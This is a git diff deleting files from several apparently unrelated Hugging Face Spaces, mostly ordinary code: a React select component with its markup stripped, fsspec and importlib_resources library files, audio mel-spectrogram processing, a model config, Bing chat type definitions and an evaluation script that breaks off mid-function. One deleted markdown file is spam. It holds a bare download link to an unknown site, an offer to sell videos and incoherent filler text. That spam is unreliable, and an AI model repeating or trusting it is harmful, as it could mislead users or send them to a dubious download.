ref) => ( - - {children} - - - - -)) -SelectTrigger.displayName = SelectPrimitive.Trigger.displayName - -const SelectContent = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, children, position = 'popper', ...props }, ref) => ( - - - - {children} - - - -)) -SelectContent.displayName = SelectPrimitive.Content.displayName - -const SelectLabel = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, ...props }, ref) => ( - -)) -SelectLabel.displayName = SelectPrimitive.Label.displayName - -const SelectItem = React.forwardRef< - 
React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, children, ...props }, ref) => ( - - - - - - - {children} - -)) -SelectItem.displayName = SelectPrimitive.Item.displayName - -const SelectSeparator = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, ...props }, ref) => ( - -)) -SelectSeparator.displayName = SelectPrimitive.Separator.displayName - -export { - Select, - SelectGroup, - SelectValue, - SelectTrigger, - SelectContent, - SelectLabel, - SelectItem, - SelectSeparator -} diff --git a/spaces/daarumadx/bot/src/gpu_info.py b/spaces/daarumadx/bot/src/gpu_info.py deleted file mode 100644 index f06825f4fccd7ea013be8eec0e479bb77e005d10..0000000000000000000000000000000000000000 --- a/spaces/daarumadx/bot/src/gpu_info.py +++ /dev/null @@ -1,34 +0,0 @@ -"""gpu-info logic.""" -import json as j - -from torch import cuda - -from config import Config as Conf - - -def get_info(): - """ - Get gpu info. - - :return: gpu info - """ - return { - "has_cuda": cuda.is_available(), - "devices": [] if not cuda.is_available() else [cuda.get_device_name(i) for i in range(cuda.device_count())], - } - - -def main(_): - """ - Start gpu info main logic. - - :param _: None - :return: None - """ - info = get_info() - if not Conf.args['json']: - Conf.log.info("Has Cuda: {}".format(info["has_cuda"])) - for (i, device) in enumerate(info["devices"]): - Conf.log.info("GPU {}: {}".format(i, device)) - else: - print(j.dumps(info)) diff --git a/spaces/darkstorm2150/protogen-web-ui/README.md b/spaces/darkstorm2150/protogen-web-ui/README.md deleted file mode 100644 index 7de302a18c1d0267c2a75988dc573e30df289538..0000000000000000000000000000000000000000 --- a/spaces/darkstorm2150/protogen-web-ui/README.md +++ /dev/null @@ -1,46 +0,0 @@ ---- -title: Stable Diffusion OpenGen v1.0 Web UI -emoji: ⚛ -colorFrom: pink -colorTo: purple -sdk: docker -#sdk_version: 3.9 -app_file: DockerApp.py -pinned: false ---- - -### Under major construction, code may be unstable - -### ProtoGen Diffusion model merged by [darkstorm2150](https://twitter.com/Predogl) - -This model was merged on a large amount of data from large datasets new and trending on civitai.com - -You can enforce camera capture by using the prompt with "modelshoot style". - -It should also be very dreamboothable, being able to generate high fidelity faces with a little amount of steps. - -**[By using this model you agree to this license](https://huggingface.co/dreamlike-art/dreamlike-photoreal-2.0/blob/main/LICENSE.md), I the creator darkstorm2150 of this merge and Hugging Face is not liable for any content created by this Protogen Model.** - - - - - - - - - - - - - - -## Other.. 
- -## Stable Diffusion Web UI -[https://github.com/AUTOMATIC1111/stable-diffusion-webui](https://github.com/AUTOMATIC1111/stable-diffusion-webui) - -## Documentation -[https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki) - -## Models License -https://huggingface.co/spaces/CompVis/stable-diffusion-license \ No newline at end of file diff --git a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/fsspec/implementations/arrow.py b/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/fsspec/implementations/arrow.py deleted file mode 100644 index 3b1048acdec34d4f5eeff90e30e3629023c6099d..0000000000000000000000000000000000000000 --- a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/fsspec/implementations/arrow.py +++ /dev/null @@ -1,297 +0,0 @@ -import errno -import io -import os -import secrets -import shutil -from contextlib import suppress -from functools import cached_property, wraps - -from fsspec.spec import AbstractFileSystem -from fsspec.utils import ( - get_package_version_without_import, - infer_storage_options, - mirror_from, - tokenize, -) - - -def wrap_exceptions(func): - @wraps(func) - def wrapper(*args, **kwargs): - try: - return func(*args, **kwargs) - except OSError as exception: - if not exception.args: - raise - - message, *args = exception.args - if isinstance(message, str) and "does not exist" in message: - raise FileNotFoundError(errno.ENOENT, message) from exception - else: - raise - - return wrapper - - -PYARROW_VERSION = None - - -class ArrowFSWrapper(AbstractFileSystem): - """FSSpec-compatible wrapper of pyarrow.fs.FileSystem. - - Parameters - ---------- - fs : pyarrow.fs.FileSystem - - """ - - root_marker = "/" - - def __init__(self, fs, **kwargs): - global PYARROW_VERSION - PYARROW_VERSION = get_package_version_without_import("pyarrow") - self.fs = fs - super().__init__(**kwargs) - - @property - def protocol(self): - return self.fs.type_name - - @cached_property - def fsid(self): - return "hdfs_" + tokenize(self.fs.host, self.fs.port) - - @classmethod - def _strip_protocol(cls, path): - ops = infer_storage_options(path) - path = ops["path"] - if path.startswith("//"): - # special case for "hdfs://path" (without the triple slash) - path = path[1:] - return path - - def ls(self, path, detail=False, **kwargs): - path = self._strip_protocol(path) - from pyarrow.fs import FileSelector - - entries = [ - self._make_entry(entry) - for entry in self.fs.get_file_info(FileSelector(path)) - ] - if detail: - return entries - else: - return [entry["name"] for entry in entries] - - def info(self, path, **kwargs): - path = self._strip_protocol(path) - [info] = self.fs.get_file_info([path]) - return self._make_entry(info) - - def exists(self, path): - path = self._strip_protocol(path) - try: - self.info(path) - except FileNotFoundError: - return False - else: - return True - - def _make_entry(self, info): - from pyarrow.fs import FileType - - if info.type is FileType.Directory: - kind = "directory" - elif info.type is FileType.File: - kind = "file" - elif info.type is FileType.NotFound: - raise FileNotFoundError(errno.ENOENT, os.strerror(errno.ENOENT), info.path) - else: - kind = "other" - - return { - "name": info.path, - "size": info.size, - "type": kind, - "mtime": info.mtime, - } - - @wrap_exceptions - def cp_file(self, path1, path2, **kwargs): - path1 = self._strip_protocol(path1).rstrip("/") - path2 = 
self._strip_protocol(path2).rstrip("/") - - with self._open(path1, "rb") as lstream: - tmp_fname = f"{path2}.tmp.{secrets.token_hex(6)}" - try: - with self.open(tmp_fname, "wb") as rstream: - shutil.copyfileobj(lstream, rstream) - self.fs.move(tmp_fname, path2) - except BaseException: # noqa - with suppress(FileNotFoundError): - self.fs.delete_file(tmp_fname) - raise - - @wrap_exceptions - def mv(self, path1, path2, **kwargs): - path1 = self._strip_protocol(path1).rstrip("/") - path2 = self._strip_protocol(path2).rstrip("/") - self.fs.move(path1, path2) - - mv_file = mv - - @wrap_exceptions - def rm_file(self, path): - path = self._strip_protocol(path) - self.fs.delete_file(path) - - @wrap_exceptions - def rm(self, path, recursive=False, maxdepth=None): - path = self._strip_protocol(path).rstrip("/") - if self.isdir(path): - if recursive: - self.fs.delete_dir(path) - else: - raise ValueError("Can't delete directories without recursive=False") - else: - self.fs.delete_file(path) - - @wrap_exceptions - def _open(self, path, mode="rb", block_size=None, seekable=True, **kwargs): - if mode == "rb": - if seekable: - method = self.fs.open_input_file - else: - method = self.fs.open_input_stream - elif mode == "wb": - method = self.fs.open_output_stream - elif mode == "ab": - method = self.fs.open_append_stream - else: - raise ValueError(f"unsupported mode for Arrow filesystem: {mode!r}") - - _kwargs = {} - if mode != "rb" or not seekable: - if int(PYARROW_VERSION.split(".")[0]) >= 4: - # disable compression auto-detection - _kwargs["compression"] = None - stream = method(path, **_kwargs) - - return ArrowFile(self, stream, path, mode, block_size, **kwargs) - - @wrap_exceptions - def mkdir(self, path, create_parents=True, **kwargs): - path = self._strip_protocol(path) - if create_parents: - self.makedirs(path, exist_ok=True) - else: - self.fs.create_dir(path, recursive=False) - - @wrap_exceptions - def makedirs(self, path, exist_ok=False): - path = self._strip_protocol(path) - self.fs.create_dir(path, recursive=True) - - @wrap_exceptions - def rmdir(self, path): - path = self._strip_protocol(path) - self.fs.delete_dir(path) - - @wrap_exceptions - def modified(self, path): - path = self._strip_protocol(path) - return self.fs.get_file_info(path).mtime - - def cat_file(self, path, start=None, end=None, **kwargs): - kwargs["seekable"] = start not in [None, 0] - return super().cat_file(path, start=None, end=None, **kwargs) - - def get_file(self, rpath, lpath, **kwargs): - kwargs["seekable"] = False - super().get_file(rpath, lpath, **kwargs) - - -@mirror_from( - "stream", - [ - "read", - "seek", - "tell", - "write", - "readable", - "writable", - "close", - "size", - "seekable", - ], -) -class ArrowFile(io.IOBase): - def __init__(self, fs, stream, path, mode, block_size=None, **kwargs): - self.path = path - self.mode = mode - - self.fs = fs - self.stream = stream - - self.blocksize = self.block_size = block_size - self.kwargs = kwargs - - def __enter__(self): - return self - - def __exit__(self, *args): - return self.close() - - -class HadoopFileSystem(ArrowFSWrapper): - """A wrapper on top of the pyarrow.fs.HadoopFileSystem - to connect it's interface with fsspec""" - - protocol = "hdfs" - - def __init__( - self, - host="default", - port=0, - user=None, - kerb_ticket=None, - extra_conf=None, - **kwargs, - ): - """ - - Parameters - ---------- - host: str - Hostname, IP or "default" to try to read from Hadoop config - port: int - Port to connect on, or default from Hadoop config if 0 - user: str or None - 
If given, connect as this username - kerb_ticket: str or None - If given, use this ticket for authentication - extra_conf: None or dict - Passed on to HadoopFileSystem - """ - from pyarrow.fs import HadoopFileSystem - - fs = HadoopFileSystem( - host=host, - port=port, - user=user, - kerb_ticket=kerb_ticket, - extra_conf=extra_conf, - ) - super().__init__(fs=fs, **kwargs) - - @staticmethod - def _get_kwargs_from_urls(path): - ops = infer_storage_options(path) - out = {} - if ops.get("host", None): - out["host"] = ops["host"] - if ops.get("username", None): - out["user"] = ops["username"] - if ops.get("port", None): - out["port"] = ops["port"] - return out diff --git a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/index-7791ea05.css b/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/index-7791ea05.css deleted file mode 100644 index 05668d2c0ae8519b42b80fc59874d05887b44a15..0000000000000000000000000000000000000000 --- a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/index-7791ea05.css +++ /dev/null @@ -1 +0,0 @@ -.container.svelte-taudaj.svelte-taudaj{display:flex;flex-direction:column;gap:var(--spacing-sm);padding:var(--block-padding)}.hl.svelte-taudaj+.hl.svelte-taudaj{margin-left:var(--size-1)}.textspan.svelte-taudaj:last-child>.label.svelte-taudaj{margin-right:0}.category-legend.svelte-taudaj.svelte-taudaj{display:flex;flex-wrap:wrap;gap:var(--spacing-sm);color:#000}.category-label.svelte-taudaj.svelte-taudaj{cursor:pointer;border-radius:var(--radius-xs);padding-right:var(--size-2);padding-left:var(--size-2);font-weight:var(--weight-semibold)}.color-legend.svelte-taudaj.svelte-taudaj{display:flex;justify-content:space-between;border-radius:var(--radius-xs);background:linear-gradient(to right,var(--color-purple),rgba(255,255,255,0),var(--color-red));padding:var(--size-1) var(--size-2);font-weight:var(--weight-semibold)}.textfield.svelte-taudaj.svelte-taudaj{box-sizing:border-box;border-radius:var(--radius-xs);background:var(--background-fill-primary);background-color:transparent;max-width:var(--size-full);line-height:var(--scale-4);word-break:break-all}.textspan.svelte-taudaj.svelte-taudaj{transition:.15s;border-radius:var(--radius-xs);padding-top:2.5px;padding-right:var(--size-1);padding-bottom:3.5px;padding-left:var(--size-1);color:#000}.label.svelte-taudaj.svelte-taudaj{transition:.15s;margin-top:1px;margin-right:calc(var(--size-1) * -1);border-radius:var(--radius-xs);padding:1px 5px;color:var(--body-text-color);color:#fff;font-weight:var(--weight-bold);font-size:var(--text-sm);text-transform:uppercase}.text.svelte-taudaj.svelte-taudaj{color:#000;white-space:pre-wrap}.score-text.svelte-taudaj .text.svelte-taudaj{color:var(--body-text-color)}.score-text.svelte-taudaj.svelte-taudaj{margin-right:var(--size-1);padding:var(--size-1)}.no-cat.svelte-taudaj.svelte-taudaj,.no-label.svelte-taudaj.svelte-taudaj{color:var(--body-text-color)}.selectable.svelte-taudaj.svelte-taudaj{cursor:pointer} diff --git a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/importlib_resources/_adapters.py b/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/importlib_resources/_adapters.py deleted file mode 100644 index 50688fbb666658c5b0569a363a4ea5b75f2fc00d..0000000000000000000000000000000000000000 --- 
a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/importlib_resources/_adapters.py +++ /dev/null @@ -1,168 +0,0 @@ -from contextlib import suppress -from io import TextIOWrapper - -from . import abc - - -class SpecLoaderAdapter: - """ - Adapt a package spec to adapt the underlying loader. - """ - - def __init__(self, spec, adapter=lambda spec: spec.loader): - self.spec = spec - self.loader = adapter(spec) - - def __getattr__(self, name): - return getattr(self.spec, name) - - -class TraversableResourcesLoader: - """ - Adapt a loader to provide TraversableResources. - """ - - def __init__(self, spec): - self.spec = spec - - def get_resource_reader(self, name): - return CompatibilityFiles(self.spec)._native() - - -def _io_wrapper(file, mode='r', *args, **kwargs): - if mode == 'r': - return TextIOWrapper(file, *args, **kwargs) - elif mode == 'rb': - return file - raise ValueError(f"Invalid mode value '{mode}', only 'r' and 'rb' are supported") - - -class CompatibilityFiles: - """ - Adapter for an existing or non-existent resource reader - to provide a compatibility .files(). - """ - - class SpecPath(abc.Traversable): - """ - Path tied to a module spec. - Can be read and exposes the resource reader children. - """ - - def __init__(self, spec, reader): - self._spec = spec - self._reader = reader - - def iterdir(self): - if not self._reader: - return iter(()) - return iter( - CompatibilityFiles.ChildPath(self._reader, path) - for path in self._reader.contents() - ) - - def is_file(self): - return False - - is_dir = is_file - - def joinpath(self, other): - if not self._reader: - return CompatibilityFiles.OrphanPath(other) - return CompatibilityFiles.ChildPath(self._reader, other) - - @property - def name(self): - return self._spec.name - - def open(self, mode='r', *args, **kwargs): - return _io_wrapper(self._reader.open_resource(None), mode, *args, **kwargs) - - class ChildPath(abc.Traversable): - """ - Path tied to a resource reader child. - Can be read but doesn't expose any meaningful children. - """ - - def __init__(self, reader, name): - self._reader = reader - self._name = name - - def iterdir(self): - return iter(()) - - def is_file(self): - return self._reader.is_resource(self.name) - - def is_dir(self): - return not self.is_file() - - def joinpath(self, other): - return CompatibilityFiles.OrphanPath(self.name, other) - - @property - def name(self): - return self._name - - def open(self, mode='r', *args, **kwargs): - return _io_wrapper( - self._reader.open_resource(self.name), mode, *args, **kwargs - ) - - class OrphanPath(abc.Traversable): - """ - Orphan path, not tied to a module spec or resource reader. - Can't be read and doesn't expose any meaningful children. - """ - - def __init__(self, *path_parts): - if len(path_parts) < 1: - raise ValueError('Need at least one path part to construct a path') - self._path = path_parts - - def iterdir(self): - return iter(()) - - def is_file(self): - return False - - is_dir = is_file - - def joinpath(self, other): - return CompatibilityFiles.OrphanPath(*self._path, other) - - @property - def name(self): - return self._path[-1] - - def open(self, mode='r', *args, **kwargs): - raise FileNotFoundError("Can't open orphan path") - - def __init__(self, spec): - self.spec = spec - - @property - def _reader(self): - with suppress(AttributeError): - return self.spec.loader.get_resource_reader(self.spec.name) - - def _native(self): - """ - Return the native reader if it supports files(). 
- """ - reader = self._reader - return reader if hasattr(reader, 'files') else self - - def __getattr__(self, attr): - return getattr(self._reader, attr) - - def files(self): - return CompatibilityFiles.SpecPath(self.spec, self._reader) - - -def wrap_spec(package): - """ - Construct a package spec with traversable compatibility - on the spec/loader/reader. - """ - return SpecLoaderAdapter(package.__spec__, TraversableResourcesLoader) diff --git a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/jsonschema/tests/__init__.py b/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/jsonschema/tests/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/deepskyreal/ai-mixer-hotchpotch/sad_talker/src/utils/safetensor_helper.py b/spaces/deepskyreal/ai-mixer-hotchpotch/sad_talker/src/utils/safetensor_helper.py deleted file mode 100644 index 3cdbdd21e4ed656dfe2d31a57360afb3e96480b3..0000000000000000000000000000000000000000 --- a/spaces/deepskyreal/ai-mixer-hotchpotch/sad_talker/src/utils/safetensor_helper.py +++ /dev/null @@ -1,8 +0,0 @@ - - -def load_x_from_safetensor(checkpoint, key): - x_generator = {} - for k,v in checkpoint.items(): - if key in k: - x_generator[k.replace(key+'.', '')] = v - return x_generator \ No newline at end of file diff --git a/spaces/diacanFperku/AutoGPT/Brianna Aka Jessi - 100 Pics.55 !LINK!.md b/spaces/diacanFperku/AutoGPT/Brianna Aka Jessi - 100 Pics.55 !LINK!.md deleted file mode 100644 index 2bdcca24eab963977cf1ed1dfbb07d794762ffeb..0000000000000000000000000000000000000000 --- a/spaces/diacanFperku/AutoGPT/Brianna Aka Jessi - 100 Pics.55 !LINK!.md +++ /dev/null @@ -1,11 +0,0 @@ -

    Brianna aka Jessi - 100 Pics.55


    Download >> https://gohhs.com/2uFT6B



    -
    -3 videos - $12 -6 videos - $35 -10 videos - $55 -Video every week (3 videos + photos) for 6-8 weeks - $100. Text me XXX if interested ❤️. In our family, we have often discussed how many people do not love their children. -And it is not the fault of the children that mom and dad do not love them, but because the parents themselves are not confident in their abilities, in the correctness of their decisions and in their love, which means they do not love their children. -As a result, both children and parents suffer - children do not receive proper parental love and respect, and parents cannot find themselves and their own way. -What about children? -Well, what about children? -They become as miserable and deprived as their parents. 8a78ff9644
    -
    -
    -

    diff --git a/spaces/digitalxingtong/Jiaohuaji-Bert-Vits2/mel_processing.py b/spaces/digitalxingtong/Jiaohuaji-Bert-Vits2/mel_processing.py deleted file mode 100644 index 50435ecf88ef4fb6c1d47f3e6edd04c3ea7d3e80..0000000000000000000000000000000000000000 --- a/spaces/digitalxingtong/Jiaohuaji-Bert-Vits2/mel_processing.py +++ /dev/null @@ -1,112 +0,0 @@ -import math -import os -import random -import torch -from torch import nn -import torch.nn.functional as F -import torch.utils.data -import numpy as np -import librosa -import librosa.util as librosa_util -from librosa.util import normalize, pad_center, tiny -from scipy.signal import get_window -from scipy.io.wavfile import read -from librosa.filters import mel as librosa_mel_fn - -MAX_WAV_VALUE = 32768.0 - - -def dynamic_range_compression_torch(x, C=1, clip_val=1e-5): - """ - PARAMS - ------ - C: compression factor - """ - return torch.log(torch.clamp(x, min=clip_val) * C) - - -def dynamic_range_decompression_torch(x, C=1): - """ - PARAMS - ------ - C: compression factor used to compress - """ - return torch.exp(x) / C - - -def spectral_normalize_torch(magnitudes): - output = dynamic_range_compression_torch(magnitudes) - return output - - -def spectral_de_normalize_torch(magnitudes): - output = dynamic_range_decompression_torch(magnitudes) - return output - - -mel_basis = {} -hann_window = {} - - -def spectrogram_torch(y, n_fft, sampling_rate, hop_size, win_size, center=False): - if torch.min(y) < -1.: - print('min value is ', torch.min(y)) - if torch.max(y) > 1.: - print('max value is ', torch.max(y)) - - global hann_window - dtype_device = str(y.dtype) + '_' + str(y.device) - wnsize_dtype_device = str(win_size) + '_' + dtype_device - if wnsize_dtype_device not in hann_window: - hann_window[wnsize_dtype_device] = torch.hann_window(win_size).to(dtype=y.dtype, device=y.device) - - y = torch.nn.functional.pad(y.unsqueeze(1), (int((n_fft-hop_size)/2), int((n_fft-hop_size)/2)), mode='reflect') - y = y.squeeze(1) - - spec = torch.stft(y, n_fft, hop_length=hop_size, win_length=win_size, window=hann_window[wnsize_dtype_device], - center=center, pad_mode='reflect', normalized=False, onesided=True, return_complex=False) - - spec = torch.sqrt(spec.pow(2).sum(-1) + 1e-6) - return spec - - -def spec_to_mel_torch(spec, n_fft, num_mels, sampling_rate, fmin, fmax): - global mel_basis - dtype_device = str(spec.dtype) + '_' + str(spec.device) - fmax_dtype_device = str(fmax) + '_' + dtype_device - if fmax_dtype_device not in mel_basis: - mel = librosa_mel_fn(sampling_rate, n_fft, num_mels, fmin, fmax) - mel_basis[fmax_dtype_device] = torch.from_numpy(mel).to(dtype=spec.dtype, device=spec.device) - spec = torch.matmul(mel_basis[fmax_dtype_device], spec) - spec = spectral_normalize_torch(spec) - return spec - - -def mel_spectrogram_torch(y, n_fft, num_mels, sampling_rate, hop_size, win_size, fmin, fmax, center=False): - if torch.min(y) < -1.: - print('min value is ', torch.min(y)) - if torch.max(y) > 1.: - print('max value is ', torch.max(y)) - - global mel_basis, hann_window - dtype_device = str(y.dtype) + '_' + str(y.device) - fmax_dtype_device = str(fmax) + '_' + dtype_device - wnsize_dtype_device = str(win_size) + '_' + dtype_device - if fmax_dtype_device not in mel_basis: - mel = librosa_mel_fn(sampling_rate, n_fft, num_mels, fmin, fmax) - mel_basis[fmax_dtype_device] = torch.from_numpy(mel).to(dtype=y.dtype, device=y.device) - if wnsize_dtype_device not in hann_window: - hann_window[wnsize_dtype_device] = torch.hann_window(win_size).to(dtype=y.dtype, 
device=y.device) - - y = torch.nn.functional.pad(y.unsqueeze(1), (int((n_fft-hop_size)/2), int((n_fft-hop_size)/2)), mode='reflect') - y = y.squeeze(1) - - spec = torch.stft(y, n_fft, hop_length=hop_size, win_length=win_size, window=hann_window[wnsize_dtype_device], - center=center, pad_mode='reflect', normalized=False, onesided=True, return_complex=False) - - spec = torch.sqrt(spec.pow(2).sum(-1) + 1e-6) - - spec = torch.matmul(mel_basis[fmax_dtype_device], spec) - spec = spectral_normalize_torch(spec) - - return spec diff --git a/spaces/dinhminh20521597/OCR_DEMO/configs/_base_/det_models/panet_r50_fpem_ffm.py b/spaces/dinhminh20521597/OCR_DEMO/configs/_base_/det_models/panet_r50_fpem_ffm.py deleted file mode 100644 index 4d8812532c73f8945097de8262b539d0109055df..0000000000000000000000000000000000000000 --- a/spaces/dinhminh20521597/OCR_DEMO/configs/_base_/det_models/panet_r50_fpem_ffm.py +++ /dev/null @@ -1,21 +0,0 @@ -model = dict( - type='PANet', - pretrained='torchvision://resnet50', - backbone=dict( - type='mmdet.ResNet', - depth=50, - num_stages=4, - out_indices=(0, 1, 2, 3), - frozen_stages=1, - norm_cfg=dict(type='BN', requires_grad=True), - norm_eval=True, - style='caffe'), - neck=dict(type='FPEM_FFM', in_channels=[256, 512, 1024, 2048]), - bbox_head=dict( - type='PANHead', - in_channels=[128, 128, 128, 128], - out_channels=6, - loss=dict(type='PANLoss', speedup_bbox_thr=32), - postprocessor=dict(type='PANPostprocessor', text_repr_type='poly')), - train_cfg=None, - test_cfg=None) diff --git a/spaces/ds520/bingo/src/lib/bots/bing/types.ts b/spaces/ds520/bingo/src/lib/bots/bing/types.ts deleted file mode 100644 index 02cd5e8b01e3529642d28dc1539bf958f4ac420b..0000000000000000000000000000000000000000 --- a/spaces/ds520/bingo/src/lib/bots/bing/types.ts +++ /dev/null @@ -1,259 +0,0 @@ -export type Author = 'user' | 'system' | 'bot' - -export type BotId = 'bing' - -export enum BingConversationStyle { - Creative = 'Creative', - Balanced = 'Balanced', - Precise = 'Precise' -} - -export enum ErrorCode { - CONVERSATION_LIMIT = 'CONVERSATION_LIMIT', - BING_UNAUTHORIZED = 'BING_UNAUTHORIZED', - BING_FORBIDDEN = 'BING_FORBIDDEN', - BING_CAPTCHA = 'BING_CAPTCHA', - THROTTLE_LIMIT = 'THROTTLE_LIMIT', - NOTFOUND_ERROR = 'NOT_FOUND_ERROR', - UNKOWN_ERROR = 'UNKOWN_ERROR', - NETWORK_ERROR = 'NETWORK_ERROR', -} - -export class ChatError extends Error { - code: ErrorCode - constructor(message: string, code: ErrorCode) { - super(message) - this.code = code - } -} - -export type ChatMessageModel = { - id: string - author: Author - text: string - error?: ChatError - throttling?: Throttling - sourceAttributions?: SourceAttribution[] - suggestedResponses?: SuggestedResponse[] -} - -export interface ConversationModel { - messages: ChatMessageModel[] -} - -export type Event = - | { - type: 'UPDATE_ANSWER' - data: { - text: string - spokenText?: string - sourceAttributions?: SourceAttribution[] - suggestedResponses?: SuggestedResponse[] - throttling?: Throttling - } - } - | { - type: 'DONE' - } - | { - type: 'ERROR' - error: ChatError - } - -export interface SendMessageParams { - prompt: string - imageUrl?: string - options: T - onEvent: (event: Event) => void - signal?: AbortSignal -} - -export interface ConversationResponse { - conversationId: string - clientId: string - conversationSignature: string - result: { - value: string - message?: string - } -} - -export interface Telemetry { - metrics?: null - startTime: string -} - -export interface ChatUpdateArgument { - messages?: ChatResponseMessage[] - 
throttling?: Throttling - requestId: string - result: null -} - -export type ChatUpdateCompleteResponse = { - type: 2 - invocationId: string - item: ChatResponseItem -} | { - type: 1 - target: string - arguments: ChatUpdateArgument[] -} | { - type: 3 - invocationId: string -} | { - type: 6 | 7 -} - -export interface ChatRequestResult { - value: string - serviceVersion: string - error?: string -} - -export interface ChatResponseItem { - messages: ChatResponseMessage[] - firstNewMessageIndex: number - suggestedResponses: null - conversationId: string - requestId: string - conversationExpiryTime: string - telemetry: Telemetry - result: ChatRequestResult - throttling: Throttling -} -export enum InvocationEventType { - Invocation = 1, - StreamItem = 2, - Completion = 3, - StreamInvocation = 4, - CancelInvocation = 5, - Ping = 6, - Close = 7, -} - -// https://github.com/bytemate/bingchat-api/blob/main/src/lib.ts - -export interface ConversationInfo { - conversationId: string - clientId: string - conversationSignature: string - invocationId: number - conversationStyle: BingConversationStyle - prompt: string - imageUrl?: string -} - -export interface BingChatResponse { - conversationSignature: string - conversationId: string - clientId: string - invocationId: number - conversationExpiryTime: Date - response: string - details: ChatResponseMessage -} - -export interface Throttling { - maxNumLongDocSummaryUserMessagesInConversation: number - maxNumUserMessagesInConversation: number - numLongDocSummaryUserMessagesInConversation: number - numUserMessagesInConversation: number -} - -export interface ChatResponseMessage { - text: string - spokenText?: string - author: string - createdAt: Date - timestamp: Date - messageId: string - requestId: string - offense: string - adaptiveCards: AdaptiveCard[] - sourceAttributions: SourceAttribution[] - feedback: Feedback - contentOrigin: string - messageType?: string - contentType?: string - privacy: null - suggestedResponses: SuggestedResponse[] -} - -export interface AdaptiveCard { - type: string - version: string - body: Body[] -} - -export interface Body { - type: string - text: string - wrap: boolean - size?: string -} - -export interface Feedback { - tag: null - updatedOn: null - type: string -} - -export interface SourceAttribution { - providerDisplayName: string - seeMoreUrl: string - searchQuery: string -} - -export interface SuggestedResponse { - text: string - author?: Author - createdAt?: Date - timestamp?: Date - messageId?: string - messageType?: string - offense?: string - feedback?: Feedback - contentOrigin?: string - privacy?: null -} - -export interface KBlobRequest { - knowledgeRequest: KnowledgeRequestContext - imageBase64?: string -} - -export interface KBlobResponse { - blobId: string - processedBlobId?: string -} - -export interface KnowledgeRequestContext { - imageInfo: ImageInfo; - knowledgeRequest: KnowledgeRequest; -} - -export interface ImageInfo { - url?: string; -} - -export interface KnowledgeRequest { - invokedSkills: string[]; - subscriptionId: string; - invokedSkillsRequestData: InvokedSkillsRequestData; - convoData: ConvoData; -} - -export interface ConvoData { - convoid: string; - convotone: BingConversationStyle; -} - -export interface InvokedSkillsRequestData { - enableFaceBlur: boolean; -} - -export interface FileItem { - url: string; - status?: 'loading' | 'error' | 'loaded' -} diff --git a/spaces/duycse1603/math2tex/ScanSSD/gtdb/diagnose.py b/spaces/duycse1603/math2tex/ScanSSD/gtdb/diagnose.py deleted file mode 100644 index 
c161a87b849eb94f1e39da704ba22f1dadaa879d..0000000000000000000000000000000000000000 --- a/spaces/duycse1603/math2tex/ScanSSD/gtdb/diagnose.py +++ /dev/null @@ -1,353 +0,0 @@ -# Author: Parag Mali -# This file contains functions that calculate character level detection results - -import os -import sys -sys.path.extend(['/home/psm2208/code', '/home/psm2208/code']) - -import csv -from multiprocessing import Pool -from IOU_lib import IOUevaluater -import copy -from gtdb import box_utils - -# check if two rectangles intersect -def intersects(first, other): - return not (first[2] < other[0] or - first[0] > other[2] or - first[1] > other[3] or - first[3] < other[1]) - -def read_data(training_pdf_names, char_dir, gt_math_dir, det_math_dir): - - char_bbs = {} - args = [] - total_math_char = 0 - - for filename in training_pdf_names: - - path = os.path.join(char_dir, filename + ".csv") - print('Processing ' + path) - count = 0 - - #data = adjust_data[filename] - - map = {} - with open(path, 'r') as csvfile: - reader = csv.reader(csvfile, delimiter=',') - for row in reader: - #print('row is ' + str(row[1])) - # if entry is not in map - if str(int(float(row[0]))) not in map: - map[str(int(float(row[0])))] = [] - - if row[6] == 'MATH_SYMBOL': - total_math_char = total_math_char + 1 - - # row[2] = data[count][1] - # row[3] = data[count][2] - # row[4] = data[count][3] - # row[5] = data[count][4] - - map[str(int(float(row[0])))].append(row) - count = count + 1 - - char_bbs[filename] = map - - det_math_bbs = {} - - for filename in training_pdf_names: - - #path = os.path.join(math_dir, filename + ".math") - path = os.path.join(det_math_dir, filename + ".csv") - - map = {} - with open(path, 'r') as csvfile: - reader = csv.reader(csvfile, delimiter=',') - for row in reader: - # if entry is not in map - if str(int(float(row[0]))) not in map: - map[str(int(float(row[0])))] = [] - - - map[str(int(float(row[0])))].append(row) - - det_math_bbs[filename] = map - - gt_math_bbs = {} - - for filename in training_pdf_names: - - path = os.path.join(gt_math_dir, filename + ".csv") - - map = {} - with open(path, 'r') as csvfile: - reader = csv.reader(csvfile, delimiter=',') - for row in reader: - # if entry is not in map - if str(int(float(row[0]))) not in map: - map[str(int(float(row[0])))] = [] - - map[str(int(float(row[0])))].append(row) - - gt_math_bbs[filename] = map - - return training_pdf_names, total_math_char, gt_math_bbs, det_math_bbs, char_bbs - - -def char_level_eval(training_pdf_names, total_math_char, gt_math_bbs, det_math_bbs, char_bbs): - - args = [] - - for key in det_math_bbs: - for page in det_math_bbs[key]: - if page not in gt_math_bbs[key]: - gt_math = [] - else: - gt_math = gt_math_bbs[key][page] - args.append([key, det_math_bbs[key][page], char_bbs[key][page], gt_math]) - - pool = Pool(processes=16) - ans = pool.map(character_level_score, args) - pool.close() - 